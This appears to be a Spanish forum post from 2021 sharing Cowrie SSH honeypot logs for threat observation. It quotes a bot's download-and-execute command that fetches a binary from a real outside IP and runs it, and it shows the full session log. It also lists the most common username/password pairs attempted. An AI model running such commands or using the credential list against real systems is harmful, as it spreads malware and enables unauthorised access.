Título: Logs interesantes Honeypot SSH (Cowrie) Publicado por: el-brujo en 17 Febrero 2021, 16:07 pm Jugando con los honeypots he visto algunas cosas interesantes, aunque todo son herramientas automatizadas y no ataques de personales "reales", son todo bots.
Pero en log que pongo pues una ip China: IP China https://www.elhacker.net/geolocalizacion.html?host=154.223.167.54 Se bajó un binario llamado 80 Citar PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80 binario 80 ELF https://www.virustotal.com/gui/file/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631/detection gcc.pid ???? https://www.virustotal.com/gui/file/05b08f11a7073248fb29cfedb0ac4d4e050356b83eeaec8d7bbcd9f25b79fdbb Top 10 comandos más utilizados: (https://i.imgur.com/BBLAnol.png) En otra máquina resulados bastante diferentes: (https://i.imgur.com/6fe20Dy.png) Adjunto el log Citar 2021-01-28T18:37:58.692411Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 154.223.167.54:43236 (192.168.0.7:2222) [session: 1f08d81dd680] 2021-01-28T18:37:58.697484Z [HoneyPotSSHTransport,4,154.223.167.54] Remote SSH version: b'SSH-2.0-PUTTY' 2021-01-28T18:37:58.957221Z [HoneyPotSSHTransport,4,154.223.167.54] SSH client hassh fingerprint: 92674389fa1e47a27ddd8d9b63ecd42b 2021-01-28T18:37:58.962131Z [HoneyPotSSHTransport,4,154.223.167.54] kex alg, key alg: b'diffie-hellman-group14-sha1' b'ssh-rsa' 2021-01-28T18:37:58.962417Z [HoneyPotSSHTransport,4,154.223.167.54] outgoing: b'aes128-ctr' b'hmac-sha1' b'none' 2021-01-28T18:37:58.962656Z [HoneyPotSSHTransport,4,154.223.167.54] incoming: b'aes128-ctr' b'hmac-sha1' b'none' 2021-01-28T18:37:59.568103Z [HoneyPotSSHTransport,4,154.223.167.54] NEW KEYS 2021-01-28T18:37:59.818998Z [HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-userauth' 2021-01-28T18:38:00.081545Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'none' 2021-01-28T18:38:00.340869Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'password' 2021-01-28T18:38:00.342139Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Could not read etc/userdb.txt, default database activated 2021-01-28T18:38:00.342961Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] login attempt [b'root'/b'mucleus.caca.root'] succeeded 2021-01-28T18:38:00.346823Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Initialized emulated server as architecture: linux-x64-lsb 2021-01-28T18:38:00.348560Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' authenticated with b'password' 2021-01-28T18:38:00.349507Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-connection' 2021-01-28T18:38:00.603490Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request 2021-01-28T18:38:00.604767Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open 2021-01-28T18:38:00.950026Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://98.159.111.131/80\ncurl -O http://98.159.111.131/80\nchmod +x 80\n./80\n'" 2021-01-28T18:38:00.952721Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80; 2021-01-28T18:39:01.013363Z [-] exitCode: 1 2021-01-28T18:39:01.013920Z [-] sending request b'exit-status' 2021-01-28T18:39:01.015173Z [-] Closing TTY Log: var/lib/cowrie/tty/419a5f3fde27adba89708285693140846f5cf0e98a43290aa5003d8b4a4252d5 after 60 seconds 2021-01-28T18:39:01.015774Z [-] sending close 0 2021-01-28T18:39:01.519587Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close 2021-01-28T18:39:01.520955Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request 2021-01-28T18:39:01.521879Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open 2021-01-28T18:39:01.774363Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] asking for subsystem "b'sftp'" 2021-01-28T18:39:01.775031Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] {b'sftp': <class 'twisted.conch.ssh.filetransfer.FileTransferServer'>} 2021-01-28T18:39:02.500813Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP openFile: b'/bin/eyshcjdmzg' 2021-01-28T18:39:06.584852Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66161 to 64911 in channel 1 2021-01-28T18:39:10.653511Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1 2021-01-28T18:39:14.733271Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1 2021-01-28T18:39:18.811865Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1 2021-01-28T18:39:22.897300Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1 2021-01-28T18:39:26.974574Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1 2021-01-28T18:39:31.093693Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1 2021-01-28T18:39:35.187235Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1 2021-01-28T18:39:39.297588Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1 2021-01-28T18:39:43.879794Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP Uploaded file "eyshcjdmzg" to var/lib/cowrie/downloads/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631 2021-01-28T18:39:44.136949Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 1 2021-01-28T18:39:44.138294Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close 2021-01-28T18:39:44.139275Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request 2021-01-28T18:39:44.140193Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open 2021-01-28T18:39:44.480978Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'/bin/eyshcjdmzg'" 2021-01-28T18:39:44.483424Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: /bin/eyshcjdmzg 2021-01-28T18:39:44.485118Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command not found: /bin/eyshcjdmzg 2021-01-28T18:39:54.752142Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0 2021-01-28T18:39:54.752851Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status' 2021-01-28T18:39:54.754609Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/27bfa685b0774a88946b7b3f3d0f6291bcc8e0ae37769309a8d086593862c0d0 after 10 seconds 2021-01-28T18:39:54.759462Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 2 2021-01-28T18:39:55.004309Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close 2021-01-28T18:39:55.296545Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request 2021-01-28T18:39:55.297591Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open 2021-01-28T18:39:56.293421Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'ls -la /var/run/gcc.pid'" 2021-01-28T18:39:56.295896Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: ls -la /var/run/gcc.pid 2021-01-28T18:39:56.297632Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command found: ls -la /var/run/gcc.pid 2021-01-28T18:39:56.298644Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0 2021-01-28T18:39:56.298941Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status' 2021-01-28T18:39:56.299253Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 3 2021-01-28T18:39:57.974393Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0 2021-01-28T18:39:57.975498Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/e9ca076a73c58dc3b053e9f3e0249b13f1c1b47d23846405096e8c10dc3f7d26 after 1 seconds 2021-01-28T18:39:57.978774Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close 2021-01-28T18:39:57.979388Z [HoneyPotSSHTransport,4,154.223.167.54] Got remote error, code 11 reason: b'' 2021-01-28T18:39:57.980313Z [HoneyPotSSHTransport,4,154.223.167.54] avatar root logging out 2021-01-28T18:39:57.980654Z [HoneyPotSSHTransport,4,154.223.167.54] connection lost 2021-01-28T18:39:57.980912Z [HoneyPotSSHTransport,4,154.223.167.54] Connection lost after 119 seconds En Twitter y en el blog he publicado algunas de las combinaciones de contraseñas más habituales Citar ############ Top 20 COWRIE Usernames for 2021-02-11 ############ 3288 b'root'|b'password' 751 b'admin'|b'password' 727 b'root'|b'none' 426 b'admin'|b'none' 252 b'Admin'|b'password' 140 b'user'|b'password' 124 b'Admin'|b'none' 118 b'ubuntu'|b'password' 96 b'nproc'|b'password' 91 b'test'|b'password' 80 b'postgres'|b'password' 46 b'nagios'|b'password' 42 b'oracle'|b'password' 39 b'guest'|b'password' 38 b'support'|b'password' 38 b'Administrator'|b'password' 30 b'git'|b'password' 28 b'deploy'|b'password' 24 b'ftpuser'|b'password' 22 b'user'|b'none' (https://i.imgur.com/eKSqzBl.png) En otra ip resultados no exactamente iguales: (https://i.imgur.com/7RNhrh6.png) Y algunos gráficos completos (país, etc) Citar 1- Irlanda 2- Rusia 3- Panamá 688 ip's diferentes en apenas 9 horas (https://i.imgur.com/neBE16z.png) |